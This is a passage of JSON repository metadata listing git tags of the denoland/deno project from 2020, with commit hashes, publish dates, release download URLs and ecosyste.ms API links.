t":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/